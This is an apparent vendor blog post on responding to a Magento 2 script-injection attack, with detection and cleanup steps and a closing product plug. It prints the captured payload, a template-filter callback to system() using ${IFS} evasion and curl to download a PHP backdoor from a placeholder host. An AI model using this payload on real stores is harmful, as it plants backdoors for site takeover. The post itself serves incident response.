Responding to a Magento Script Injection Attack


Script Explanation


We'll investigate the script below which is taken from an attempted attack on a Magento 2 website. The script
in question attempts to inject and execute dangerous commands on your Magento server, potentially compromising your entire system. Here’s a breakdown of what it does:

{{var this.getTemplateFilter().filter(order)}} {{var this.getTemplateFilter().addAfterFilterCallback(system).
Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394)}}


Breakdown of the Script

  • {{var this.getTemplateFilter().filter(order)}}: This portion of the code appears to be a benign call to a template filter function that processes order data. However, it's used here as a disguise to make the code look less suspicious.

  • {{var this.getTemplateFilter().addAfterFilterCallback(system)}}
    : This adds a callback function, likely intended to execute system-level commands. It's the beginning of a malicious command injection.

  • cd${IFS%??}pub
    : The command changes the working directory to the pub directory of your Magento installation. The ${IFS%??} part is a technique used to bypass some basic security measures by exploiting the Internal Field Separator (IFS) in shell commands.

  • curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394
    : This is the critical part of the script. It uses the curl command to download a file from an external server (replacing x.x.x.x with the actual IP address or domain) and saves it as cache.php in the pub directory. The downloaded file is likely a malicious PHP script that can be executed later.


This script essentially injects a backdoor into your Magento installation by placing a potentially malicious PHP file in a publicly accessible directory. Once in place, the attacker can execute this script to compromise your site further.

How to Check if the Script was Successful

To determine if the malicious script was successfully executed on your Magento server, follow these detailed steps:

1. Check for the Presence of Malicious Files

Navigate to the pub directory of your Magento installation and look for a file named cache.php or any other unfamiliar PHP files. You can use the following command in the terminal:

cd /path/to/magento/pub
ls -l

If you find the cache.php file or any suspicious files, this is a strong indicator that the script was successful.

2. Check the Last Modified Date and Time of Files

Reviewing the last modified dates of files, especially in the pub directory, can help you identify when a file was added or changed. This can indicate whether a file was part of the attack. Use the following command to check the last modified date and time of all files in the pub directory:

cd /path/to/magento/pub
ls -lt

This command will list all files in the directory, sorted by modification time, with the most recently modified files at the top. Look for any files that were modified at unusual times, especially if they align with when you suspect the attack occurred.

You can also check a specific file’s last modified time using:

stat cache.php

This command will show detailed information about the file, including the last modification time.

3. Review Server Logs

Examine your web server logs for any signs of unauthorized access or unusual activity, especially around the time you suspect the script might have been executed. Check both access logs and error logs:

tail -n 1000 /var/log/apache2/access.log
tail -n 1000 /var/log/apache2/error.log

Look for entries that involve the curl command or requests to the suspicious URL (e.g., http://x.x.x.x/cache.php?m=8089-28808-12394).

4. Inspect the Magento Database

The script might have been used to inject malicious content into your Magento database. Check your database for any unfamiliar entries, especially in the following tables:

  • core_config_data
  • admin_user
  • customer_entity


To query your database, you can use the following MySQL command:

mysql -u username -p
USE magento_db;
SELECT * FROM core_config_data WHERE path LIKE '%cache.php%';


Replace username with your MySQL username and magento_db with your Magento database name. If you find any suspicious data, it could mean the script successfully manipulated your database.

5. Monitor for Unusual Network Activity

Check your server's network activity to see if there have been any unexpected outbound connections. This can indicate that a malicious script is communicating with an external server:

netstat -an | grep ESTABLISHED


Look for any connections to unfamiliar IP addresses or domains, particularly those matching the URL in the script.

What to Do If the Script was Successful

If you find evidence that the script was successful, follow these steps to secure your Magento store:

1. Isolate the Affected Server

Immediately disconnect the affected server from the network to prevent further damage or data leakage. This will help contain the threat.

2. Remove Malicious Files

Manually delete any malicious files you identified, such as cache.php in the pub directory:

rm /path/to/magento/pub/cache.php

Also, check other directories for any suspicious files and remove them.

3. Restore from Backup

If possible, restore your Magento store from a clean backup made before the attack occurred. This is the safest way to ensure all traces of the malicious script are removed.

4. Change All Credentials

Change all passwords for your Magento admin, database, FTP, and any other accounts associated with the affected server. If the attacker accessed your system, they could have compromised these credentials.

5. Patch and Update

Ensure your Magento installation, as well as any extensions, are fully updated to the latest versions to patch known vulnerabilities. This reduces the risk of similar attacks in the future.

6. Implement Security Measures

Enhance your Magento store's security by installing a Web Application Firewall (WAF), enabling Two-Factor Authentication (2FA), and using security-focused extensions like ScriptGuard Pro.

7. Scan for Malware

Run a thorough malware scan on your server to detect any other potential threats. Use tools like ClamAV or a dedicated Magento security scanner.

8. Monitor for Recurrence

After taking these steps, closely monitor your server and Magento store for any signs of recurring attacks or suspicious activity. This ongoing vigilance is crucial in the aftermath of an attack.

How ScriptGuard Pro Blocks This Attack

ScriptGuard Pro can prevent such attacks by blocking the injection of malicious scripts into your Magento store. It does this by filtering out dangerous characters and commands before they can be executed, ensuring your store is protected from unauthorized code execution.

To find out more details on how to protect your Magento store using ScriptGuard Pro, please visit https://www.lecsoft.co.uk/scriptguardpro.html